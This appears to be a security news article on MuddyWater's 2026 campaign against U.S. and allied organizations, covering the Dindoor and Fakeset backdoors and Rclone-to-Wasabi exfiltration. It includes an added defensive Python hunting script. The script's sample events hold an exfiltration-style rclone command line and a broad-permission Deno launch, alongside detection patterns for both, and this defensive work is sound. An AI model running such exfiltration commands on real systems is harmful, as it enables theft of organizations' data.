Iran-Linked MuddyWater Hackers Target U.S. Networks With New Dindoor Backdoor
- akid95

Cybersecurity researchers have uncovered a targeted cyber-espionage campaign conducted by the Iran-linked threat group MuddyWater, which has infiltrated multiple organizations across the United States and allied countries. The operation targeted sectors considered strategically significant, including financial institutions, aviation infrastructure, non-profit organizations, and a software company connected to the defense and aerospace industry. The activity highlights how state-aligned threat actors continue to focus on high-value corporate networks and critical infrastructure environments.
The campaign is believed to be connected to Iran's Ministry of Intelligence and Security (MOIS), which has historically used MuddyWater as a cyber-espionage unit to support intelligence collection and geopolitical objectives. Over the years, the group has become known for long-term intrusion campaigns that rely on a mixture of custom malware, open-source tools, and legitimate cloud services to maintain persistence while minimizing detection.
Researchers observed that the campaign began in early 2026 and involved the deployment of both new and previously documented backdoors. Among the reported victims were a U.S. airport, a U.S. bank, a Canadian non-profit organization, and a software provider supporting defense-related customers. The timing of the activity has raised concern among analysts, as it coincided with heightened geopolitical tensions involving Iran and Western nations.
For advanced persistent threat groups, gaining access to strategic organizations is rarely about immediate disruption. Instead, it is about positioning: quietly embedding themselves within networks to gather intelligence and prepare for potential future operations.
A New Backdoor Emerges: Dindoor
During incident response investigations, researchers identified a previously undocumented backdoor called Dindoor deployed across several compromised systems. The malware provides attackers with persistent remote access and allows them to execute commands or deploy additional payloads on infected machines.
One unusual aspect of Dindoor is that it is built using the Deno runtime environment, a platform capable of executing JavaScript and TypeScript outside of a browser. The use of this runtime is relatively uncommon in malware development and may help the attackers evade traditional detection methods that focus primarily on more familiar scripting environments.
The backdoor was discovered on networks belonging to a U.S. financial institution, a Canadian non-profit organization, and a software company tied to the defense and aerospace sector. Once deployed, it enables the attackers to maintain ongoing access to compromised systems while issuing commands from remote command-and-control infrastructure.
For defenders, the appearance of new malware variants such as Dindoor illustrates how state-aligned groups continue to adapt their tooling to bypass security monitoring.
Reusing Familiar Tools: The Fakeset Backdoor
In addition to Dindoor, investigators also discovered the use of another malware family known as Fakeset, a Python-based backdoor previously associated with MuddyWater operations. Fakeset allows attackers to establish persistent communication with command-and-control servers, execute arbitrary system commands, and download additional malicious payloads. The malware can also facilitate reconnaissance activities, enabling attackers to map network environments and identify valuable assets.
This backdoor was identified within networks belonging to a U.S. airport and a non-profit organization. The presence of multiple malware families across different victims suggests that the attackers tailor their tooling depending on the target environment.
Such flexibility is typical of advanced persistent threat groups, which often combine custom malware with adaptable open-source frameworks to maintain long-term access.
Living off the Land for Data Exfiltration
Beyond deploying custom backdoors, the attackers relied heavily on legitimate system tools to conduct data exfiltration. One utility observed during the investigation was Rclone, a command-line tool commonly used for transferring files to cloud storage services. Once inside the network, the attackers attempted to collect sensitive data from compromised systems, compress the files, and transfer them to a cloud storage bucket hosted on Wasabi Technologies. By using Rclone to move data into cloud storage, the attackers could blend malicious activity with legitimate network traffic.
This technique, often referred to as Living-off-the-Land (LotL), allows threat actors to avoid deploying additional malware that might trigger security alerts. Instead, they rely on legitimate tools that administrators themselves might use, making detection far more difficult. The strategy reflects a growing trend in advanced cyber operations where stealth and persistence take priority over speed or visibility.
Strategic Targeting of Critical Organizations
The campaign involved intrusions across several strategically important organizations, including a U.S. airport, a financial institution, a Canadian non-profit organization, and a software provider connected to the defense and aerospace sector.
Researchers believe that attackers had already established access to several of these networks before the campaign was publicly identified. This indicates that the threat actors may have been quietly conducting reconnaissance and intelligence gathering for an extended period of time. The timing of the attacks also appears significant. The intrusions occurred during a period of increased geopolitical tension involving Iran, the United States, and Israel. Security analysts believe the attackers may have been attempting to pre-position themselves within key organizations to collect intelligence or prepare for potential cyber operations in the future.
Such long-term positioning is a hallmark of nation-state cyber operations, where persistence inside strategic networks can provide both intelligence advantages and operational leverage.
The Real Impact: Intelligence and Strategic Positioning
The primary objective of this campaign appears to be cyber-espionage rather than immediate disruption. By infiltrating organizations connected to aviation, finance, and defense-related technologies, the attackers gain access to sensitive operational and strategic information.
With persistent access, threat actors may collect internal corporate documents, proprietary technology, financial data, and confidential communications. This information can support intelligence gathering, economic advantage, or future cyber operations. The presence of attackers within critical infrastructure environments also raises concerns about potential future disruptions. Even if the current campaign focuses on espionage, the same access could be leveraged for destructive or disruptive activities if geopolitical conditions escalate.
For organizations operating in sensitive sectors, this type of long-term infiltration represents one of the most serious cybersecurity risks.
Strengthening Defenses Against APT Activity
Defending against advanced persistent threat groups requires more than basic security controls. Organizations must adopt a layered defense strategy focused on detection, monitoring, and rapid response.
Endpoint Detection and Response (EDR) solutions should be deployed to identify suspicious command execution, unusual scripting activity, and abnormal outbound connections. Monitoring the use of legitimate administrative tools, especially utilities capable of transferring large volumes of data, is equally important.
Network segmentation can also significantly reduce risk. By isolating critical infrastructure systems from general corporate networks, organizations can limit an attacker’s ability to move laterally after gaining initial access. Security teams should also conduct proactive threat hunting activities, searching for indicators such as unexpected persistence mechanisms, abnormal network traffic patterns, or unauthorized cloud synchronization tools operating inside the environment. Combined with strong identity protections, including multi-factor authentication and strict least-privilege access policies, these measures can significantly reduce the effectiveness of APT campaigns.
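As an added illustration of the threat-hunting guidance above, and of the Rclone-to-Wasabi exfiltration and Deno-based backdoor described earlier, the following Python script is not code from the original article: it applies two defensive heuristics to a handful of constructed process-creation events. The hostnames, users, paths and command lines are invented; the Wasabi endpoint domain, the rclone verbs and the Deno permission flags are real, and the allowlisted rclone path is an assumption a site would adjust.

```python
import re

# Constructed sample of process-creation events (Sysmon-like fields); not real telemetry.
SAMPLE_EVENTS = [
    {"host": "fin-ws-07", "user": "jdoe", "image": r"C:\Users\jdoe\AppData\Local\Temp\rc.exe",
     "cmdline": r"rc.exe copy C:\Finance\Q1 :s3:bucket01/q1 --s3-endpoint s3.wasabisys.com --transfers 8"},
    {"host": "fin-ws-07", "user": "jdoe", "image": r"C:\Users\jdoe\.deno\bin\deno.exe",
     "cmdline": r"deno.exe run -A --quiet C:\Users\jdoe\AppData\Roaming\svc\main.ts"},
    {"host": "it-admin-01", "user": "backupsvc", "image": r"C:\Program Files\rclone\rclone.exe",
     "cmdline": r"rclone.exe sync D:\Backups corp-backup:nightly --config C:\ProgramData\rclone\rclone.conf"},
    {"host": "dev-03", "user": "build", "image": r"C:\tools\deno\deno.exe",
     "cmdline": r"deno.exe test --allow-read C:\src\api\tests"},
]

RCLONE_VERBS = re.compile(r"\b(copy|copyto|sync|move|moveto)\b", re.I)
# rclone remote syntax: "name:path" or on-the-fly ":s3:path"; two-plus chars excludes drive letters like C:
REMOTE_ARG = re.compile(r"(^|\s)(:?[\w-]{2,}:)\S*")
USER_WRITABLE = re.compile(r"\\Users\\|\\AppData\\|\\Temp\\", re.I)
ALLOWED_RCLONE_IMAGES = {r"c:\program files\rclone\rclone.exe"}  # assumed site allowlist
DENO_BROAD_PERMS = re.compile(r"(^|\s)(-A|--allow-all|--allow-net(=\S*)?|--allow-run(=\S*)?)(\s|$)")
CLOUD_ENDPOINT = re.compile(r"\b[\w.-]*wasabisys\.com\b", re.I)


def hunt(events):
    """Return a finding per event that trips an rclone-transfer or Deno-runtime heuristic."""
    findings = []
    for ev in events:
        img, cmd, reasons = ev["image"].lower(), ev["cmdline"], []
        # Rule 1: rclone-style transfer to a cloud remote, keyed on arguments rather than the
        # binary name, since a renamed rclone binary still needs the same verb/remote syntax.
        if RCLONE_VERBS.search(cmd) and REMOTE_ARG.search(cmd):
            if img not in ALLOWED_RCLONE_IMAGES:
                reasons.append("rclone-like transfer from non-allowlisted binary")
            if USER_WRITABLE.search(img) or re.search(r"--config\s+\S*(Temp|AppData)", cmd, re.I):
                reasons.append("rclone binary or config in user-writable path")
            hit = CLOUD_ENDPOINT.search(cmd)
            if hit:
                reasons.append(f"transfer targets {hit.group(0)}")
        # Rule 2: Deno launched with broad permissions on a script living in a user profile.
        if img.endswith("deno.exe") or img.endswith("/deno"):
            if re.search(r"\brun\b", cmd) and DENO_BROAD_PERMS.search(cmd) and USER_WRITABLE.search(cmd):
                reasons.append("deno run with broad permissions on user-profile script")
        if reasons:
            findings.append({"host": ev["host"], "user": ev["user"], "image": ev["image"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f["host"], f["user"], f["image"], "; ".join(f["reasons"]), sep=" | ")
```

The legitimate nightly backup on it-admin-01 and the developer's deno test run produce no finding, which is the point of pairing each heuristic with an allowlist or a location check rather than alerting on the tool name alone.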
A Persistent Threat in the Modern Cyber Landscape
The activity attributed to MuddyWater demonstrates how state-sponsored cyber operations increasingly focus on infiltration and long-term intelligence gathering rather than immediate disruption. By quietly embedding themselves within critical organizations, attackers can monitor systems, collect sensitive information, and prepare for future cyber operations if geopolitical tensions escalate.
The use of custom backdoors such as Dindoor and Fakeset, combined with stealthy data exfiltration techniques using legitimate tools like Rclone, illustrates the evolving sophistication of modern cyber-espionage campaigns. For organizations operating in sectors such as aviation, finance, and defense-related industries, these developments serve as a clear warning. Advanced adversaries are targeting not only vulnerabilities but also strategic access. Strengthening monitoring capabilities, implementing strict access controls, and maintaining a proactive incident response posture remain essential steps in defending against persistent and well-resourced threat actors.